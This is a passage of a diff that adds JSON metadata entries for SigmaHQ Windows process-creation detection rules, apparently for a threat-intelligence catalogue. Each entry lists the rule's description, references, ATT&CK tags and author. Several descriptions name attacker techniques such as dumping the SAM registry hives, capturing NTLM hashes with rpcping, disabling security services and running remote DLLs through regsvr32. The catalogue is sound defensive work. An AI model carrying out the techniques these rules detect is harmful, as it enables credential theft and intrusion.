"author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "level": "high", + "falsepositive": [ + 
"Legitimate RClone use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "value": "Recon Information for Export with Command Prompt", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ], + "creation_date": "2021/07/30", + "filename": "proc_creation_win_susp_recon.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a set of suspicious network related commands often used in recon stages", + "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "value": "Network Reconnaissance Activity", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ], + "creation_date": "2022/02/07", + "filename": "proc_creation_win_susp_recon_network_activity.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", + "value": 
"Regedit as Trusted Installer", + "meta": { + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2021/05/27", + "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", + "value": "DLL Execution Via Register-cimprovider.exe", + "meta": { + "refs": [ + "https://twitter.com/PhilipTsukerman/status/992021361106268161", + "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_susp_register_cimprovider.yml", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", + "value": "Suspicious Registration via cscript.exe", + "meta": { + "refs": [ + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://ss64.com/vb/cscript.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + 
"creation_date": "2021/11/05", + "filename": "proc_creation_win_susp_registration_via_cscript.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects various anomalies in relation to regsvr32.exe", + "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "value": "Regsvr32 Anomaly", + "meta": { + "refs": [ + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_regsvr32_anomalies.yml", + "author": "Florian Roth, oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "value": "Regsvr32 Flags Anomaly", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/07/13", + "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a certain command line flag 
combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "value": "Suspicious Regsvr32 HTTP IP Pattern", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", + "https://twitter.com/tccontre18/status/1480950986650832903", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "FQDNs that start with a number" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files", + "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "value": "Suspicious Regsvr32 Execution With Image Extension", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2021/11/29", + "filename": "proc_creation_win_susp_regsvr32_image.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "uuid": "50919691-7302-437f-8e10-1fe088afa145", + "value": "Regsvr32 Command Line 
Without DLL",
+ "meta": {
+ "refs": [
+ "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1574",
+ "attack.execution"
+ ],
+ "creation_date": "2019/07/17",
+ "filename": "proc_creation_win_susp_regsvr32_no_dll.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares",
+ "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5",
+ "value": "Suspicious Regsvr32 Execution From Remote Share",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.010"
+ ],
+ "creation_date": "2022/10/31",
+ "filename": "proc_creation_win_susp_regsvr32_remote_share.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.",
+ "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca",
+ "value": "Regsvr32 Spawning Explorer",
+ "meta": {
+ "refs": [
+ "https://redcanary.com/blog/intelligence-insights-april-2022/",
+ "https://www.echotrail.io/insights/search/regsvr32.exe",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.010"
+ ],
+ "creation_date": "2022/05/05",
+ "filename": 
"proc_creation_win_susp_regsvr32_spawn_explorer.yml",
+ "author": "elhoim",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys",
+ "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829",
+ "value": "Reg Add Suspicious Paths",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md",
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md",
+ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2022/08/19",
+ "filename": "proc_creation_win_susp_reg_add.yml",
+ "author": "frack113, Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Rare legitimate add to registry via cli (to these locations)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility",
+ "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5",
+ "value": "Suspicious Reg Add BitLocker",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1486"
+ ],
+ "creation_date": "2021/11/15",
+ "filename": "proc_creation_win_susp_reg_bitlocker.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ 
"logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service",
+ "uuid": "5e95028c-5229-4214-afae-d653d573d0ec",
+ "value": "Reg Disable Security Service",
+ "meta": {
+ "refs": [
+ "https://twitter.com/JohnLaTwC/status/1415295021041979392",
+ "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1",
+ "https://vms.drweb.fr/virus/?i=24144899",
+ "https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2021/07/14",
+ "filename": "proc_creation_win_susp_reg_disable_sec_services.yml",
+ "author": "Florian Roth, John Lambert (idea), elhoim",
+ "level": "high",
+ "falsepositive": [
+ "Unknown",
+ "Other security solution installers"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key",
+ "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563",
+ "value": "Suspicious Reg Add Open Command",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003"
+ ],
+ "creation_date": "2021/12/20",
+ "filename": "proc_creation_win_susp_reg_open_command.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of a renamed Adfind.exe. 
AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.",
+ "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b",
+ "value": "Renamed AdFind Detection",
+ "meta": {
+ "refs": [
+ "https://www.joeware.net/freetools/tools/adfind/",
+ "https://thedfirreport.com/2020/05/08/adfind-recon/",
+ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
+ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
+ "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1018",
+ "attack.t1087.002",
+ "attack.t1482",
+ "attack.t1069.002"
+ ],
+ "creation_date": "2022/08/21",
+ "filename": "proc_creation_win_susp_renamed_adfind.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory",
+ "uuid": "1a1ed54a-2ba4-4221-94d5-01dee560d71e",
+ "value": "Renamed CreateDump Process Dump",
+ "meta": {
+ "refs": [
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
+ "https://twitter.com/bopin2020/status/1366400799199272960",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036",
+ "attack.t1003.001"
+ ],
+ 
"creation_date": "2022/09/20",
+ "filename": "proc_creation_win_susp_renamed_createdump.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Command lines that use the same flags"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation",
+ "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b",
+ "value": "Renamed ZOHO Dctask64",
+ "meta": {
+ "refs": [
+ "https://twitter.com/gN3mes1s/status/1222088214581825540",
+ "https://twitter.com/gN3mes1s/status/1222095963789111296",
+ "https://twitter.com/gN3mes1s/status/1222095371175911424",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036",
+ "attack.t1055.001",
+ "attack.t1202",
+ "attack.t1218"
+ ],
+ "creation_date": "2020/01/28",
+ "filename": "proc_creation_win_susp_renamed_dctask64.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown yet"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious renamed SysInternals DebugView execution",
+ "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f",
+ "value": "Renamed SysInternals Debug View",
+ "meta": {
+ "refs": [
+ "https://www.epicturla.com/blog/sysinturla",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml"
+ ],
+ "tags": [
+ "attack.resource_development",
+ "attack.t1588.002"
+ ],
+ "creation_date": "2020/05/28",
+ "filename": "proc_creation_win_susp_renamed_debugview.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ 
"description": "Detects execution of renamed version of PAExec. Often used by attackers",
+ "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9",
+ "value": "Renamed PAExec",
+ "meta": {
+ "refs": [
+ "https://www.poweradmin.com/paexec/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ],
+ "creation_date": "2021/05/22",
+ "filename": "proc_creation_win_susp_renamed_paexec.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Weird admins that rename their tools",
+ "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing",
+ "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\""
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.",
+ "uuid": "93671f99-04eb-4ab4-a161-70d446a84003",
+ "value": "Capture Credentials with Rpcping.exe",
+ "meta": {
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/",
+ "https://twitter.com/vysecurity/status/974806438316072960",
+ "https://twitter.com/vysecurity/status/873181705024266241",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003"
+ ],
+ "creation_date": "2020/10/09",
+ "filename": "proc_creation_win_susp_rpcping.yml",
+ "author": "Julia Fomina, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": 
"process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious process related to rundll32 based on arguments",
+ "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9",
+ "value": "Suspicious Rundll32 Activity",
+ "meta": {
+ "refs": [
+ "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/",
+ "https://twitter.com/Hexacorn/status/885258886428725250",
+ "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
+ "https://twitter.com/nas_bench/status/1433344116071583746",
+ "https://twitter.com/eral4m/status/1479106975967240209",
+ "https://twitter.com/eral4m/status/1479080793003671557",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011"
+ ],
+ "creation_date": "2019/01/16",
+ "filename": "proc_creation_win_susp_rundll32_activity.yml",
+ "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "False positives depend on scripts and administrative tools used in the monitored environment"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal",
+ "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c",
+ "value": "Suspicious Call by Ordinal",
+ "meta": {
+ "refs": [
+ "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/",
+ "https://github.com/Neo23x0/DLLRunner",
+ "https://twitter.com/cyb3rops/status/1186631731543236608",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011"
+ ],
+ 
"creation_date": "2019/10/22",
+ "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "False positives depend on scripts and administrative tools used in the monitored environment",
+ "Windows control panel elements have been identified as source (mmc)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452",
+ "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd",
+ "value": "Suspicious Rundll32 Invoking Inline VBScript",
+ "meta": {
+ "refs": [
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1055"
+ ],
+ "creation_date": "2021/03/05",
+ "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code",
+ "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3",
+ "value": "Rundll32 JS RunHTMLApplication Pattern",
+ "meta": {
+ "refs": [
+ "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2022/01/14",
+ "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ], 
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)",
+ "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c",
+ "value": "Suspicious Key Manager Access",
+ "meta": {
+ "refs": [
+ "https://twitter.com/NinjaParanoid/status/1516442028963659777",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1555.004"
+ ],
+ "creation_date": "2022/04/21",
+ "filename": "proc_creation_win_susp_rundll32_keymgr.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Administrative activity"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity",
+ "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a",
+ "value": "Suspicious Rundll32 Without Any CommandLine Params",
+ "meta": {
+ "refs": [
+ "https://www.cobaltstrike.com/help-opsec",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ],
+ "creation_date": "2021/05/27",
+ "filename": "proc_creation_win_susp_rundll32_no_params.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Possible but rare"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious process related to rundll32 based on arguments",
+ "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7",
+ "value": "Suspicious Rundll32 Script in CommandLine",
+ "meta": {
+ "refs": [
+ "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
+ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011"
+ ],
+ "creation_date": "2021/12/04",
+ "filename": "proc_creation_win_susp_rundll32_script_run.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "False positives depend on scripts and administrative tools used in the monitored environment"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.",
+ "uuid": "285b85b1-a555-4095-8652-a8a4106af63f",
+ "value": "Suspicious Rundll32 Setupapi.dll Activity",
+ "meta": {
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
+ "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf",
+ "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf",
+ "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011"
+ ],
+ "creation_date": "2020/10/07",
+ "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml",
+ "author": 
"Konstantin Grishchenko, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "Scripts and administrative tools that use INF files for driver installation with setupapi.dll"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way",
+ "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b",
+ "value": "RunDLL32 Spawning Explorer",
+ "meta": {
+ "refs": [
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011"
+ ],
+ "creation_date": "2022/04/27",
+ "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml",
+ "author": "elhoim, CD_ROM_",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452",
+ "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea",
+ "value": "Suspicious Rundll32 Activity Invoking Sys File",
+ "meta": {
+ "refs": [
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.011"
+ ],
+ "creation_date": "2021/03/05",
+ "filename": "proc_creation_win_susp_rundll32_sys.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a suspicious 
call to the user32.dll function that locks the user workstation",
+ "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc",
+ "value": "Suspicious Workstation Locking via Rundll32",
+ "meta": {
+ "refs": [
+ "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2022/06/04",
+ "filename": "proc_creation_win_susp_rundll32_user32_dll.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option"
